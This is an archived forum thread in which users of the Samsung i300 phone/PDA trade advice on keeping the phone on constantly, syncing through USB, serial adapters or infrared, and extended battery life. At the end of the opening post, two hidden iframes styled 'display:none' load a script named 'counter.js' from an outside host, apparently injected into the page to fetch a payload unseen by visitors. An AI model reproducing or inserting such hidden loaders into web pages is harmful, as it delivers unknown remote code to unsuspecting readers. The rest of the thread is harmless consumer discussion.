+ Reply to Thread

Thumbs up Need feedback from users

Hi all, I've been reading your posts and thank you for sharing your experiences with the i300. I'm ready to join you, but have a couple specific questions first. I'll be switching from a phone and iPAQ to the combo i300.

1. I get bored quickly, so change phones ~every 6 months...now using Touchpoint 1100, have also used TP5000 and TP3000. I live in both Dallas and Chicago (Chicago weekdays, Dallas weekends), so I never turn the phone off....other than during a flight...will this be a problem for the i300? I opted to use my PCS service instead of a landline from Ameritec in Chicago....works great but have to leave it on 24 x 7.

2. Is the serial connection worth the hassle and fuss? I also use a Dell Latitude L400, which has only USB for ports....unless someone knows if the i300 software will let you use the printer port to sync (an old trick years ago)?

Thanks in advance...your posts are very informative and helpful.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Dr. Dan

your dell most likely has an infrared port, so you could easily sync up using that..
    -mark

u could always buy a serial/usb adapter, which is what i did, since my desktop only has 1 Serial port, which is being used by my LCD/VFD display.... and my laptops only have USB ports...

I also never turn my phone off. The only issue is in battery life. The standard batteries do not last all that long (day to day and a half), so you better always have the other battery in the charger. Or, get the extended batteries.

As far as a sync goes, I almost always use IR. I find it very convienient , no cables, no hassle. I don't have to wait until I am near my cradle. I sync my phone to my laptop. No desktop involved. If you do not have an IR port on your Dell, you can get a USB connected IR port.
    Carl

Db you have nothing to worry friend. My home was a construction war zone for a number of months and since I hadn't had a phone line run yet, the I300 earned its keep! I haven't turned my phone off too much since I've had it, and travel a bit as well. As I posted in a similar thread, flying with the I300 is not an issue. Works great.

BTW have you looked into RCN for phone/cable/internet service in Chicago? About $100/month and you're set. I couldn't say no!

Iwish......actually, the Dell has no IR or serial ports.....as a cutting edge dude, didn't think I'd be needing these relics.....you know, with USB and all. HA!

Has anyone been able to purchase the extended battery? Does it perfom better than the slim jims?

Thanx,
    Dr. Dan

The extended battery is available at www.samsungusa.com for $69.99 - 20% off. I think the price reflects a recent $10 hike. I've seen reports here that the extended has offered as much as a 75% longer life.

Originally posted by dBlevels
    Iwish......actually, the Dell has no IR or serial ports.....as a cutting edge dude, didn't think I'd be needing these relics.....you know, with USB and all. HA!

Has anyone been able to purchase the extended battery? Does it perfom better than the slim jims?

Thanx,
    Dan:
    I have 2 extended batteries and rotate them. I haven't use the slim batteries since I got the extended. As mj suggest, I would say about 75% better life is correct. I got between 1-1.5 days with the slim (I never turn my phone off), and get betwenn 2.5 and 3 days with the extended batteries. No problems with the phone fitting into my case (the $10 Sanyo Neoprene job from Target) either. The only thing I can see using the slim battereis for now, is if I need to keep the phone in my front shirt pocket, then the size/weight might make a difference. I weighted the slims and extended batteries and the difference was very small. I do not remember the number off the top of my head, but it is posted in another thread.
    Carl

Re: Need feedback from users

2. Is the serial connection worth the hassle and fuss? I also use a Dell Latitude L400, which has only USB for ports....unless someone knows if the i300 software will let you use the printer port to sync (an old trick years ago)?

Thanks in advance...your posts are very informative and helpful.
    I, too, have an L400. I'm synching with my USB port. Check out http://www.sphi300.com/showthread.ph...=3412#post3412 for details.

Thanx,

I've been using the extended for some time now, and have never run out of juice in one day. I do carry a std batt just in case, but have never used it. Knowing my luck, when I do need it, it'll have discharged by then, anyways...
    Last edited by crlipman; 01-14-2002 at 11:00 AM.

Question

Well, I purchased the i300 this morning....charging now...also ordered extended batteries, car charger and sync cable from Samsung online. I picked up a Belken USB/Serial adapter at CompUSA ($79...ugh!), but after reading your post, seems you picked up a cable adater for $10? Was that the Sakar brand? Guess I'm headed back to CompUSA for an exchange (which is nearly as fun as running to Home Depot!).

Thanks,
    Dr. Dan

'twas the Sakar. CompUSA sold it for $20 (maybe on sale) with a $10 manuf rebate. Dunno if it's still avail. I'm using the setup on a Windows2000 PC.

Dr. Dann,

Under the FWIW category, I avoid Comp USA like the plague. I find there prices to be very high, and their sales people to be unknowledgeable and rude. Of course, your store may be different, but the prices probably are the same.

I much prefer Circuit City or BrandsMart, and I will admit that the local Best Buy has improved, although I still am not wild about them.

Anyway, that's the way it is in the Miami area....

Craig

Guess I shoulda asked earlier, but will this thing sync with more than one machine? My iPAQ could share/update info on two pc's.

Thanks,
    Dr. Dan

Thanx,
    I think I read somewhere that the standard batteries are 970 (?) mah's, whereas the extended ones are 1400... so it's about 50% more power.

-mark